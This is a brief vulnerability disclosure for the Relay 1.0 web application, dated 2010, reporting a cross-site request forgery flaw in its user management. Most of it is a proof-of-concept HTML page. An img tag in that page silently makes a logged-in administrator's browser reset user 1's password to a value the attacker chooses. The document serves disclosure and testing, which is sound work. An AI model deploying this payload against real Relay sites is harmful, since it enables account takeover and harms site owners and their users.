Search
Software Vulnerability Tested On Date
Relay 1.0 Cross-site Request Forgery Windows Vista + XAMPP 7/7/2010
Description
A vulnerability in Relay 1.0 can be exploited to create a user's password.
Proof of Concept
<html>
    <body>
        <img src="http://localhost/relay/management/index.php?page=manage&module=users&action=newPassword&uid=1&pass=Password1&passconf=Password1" />
    </body>
</html>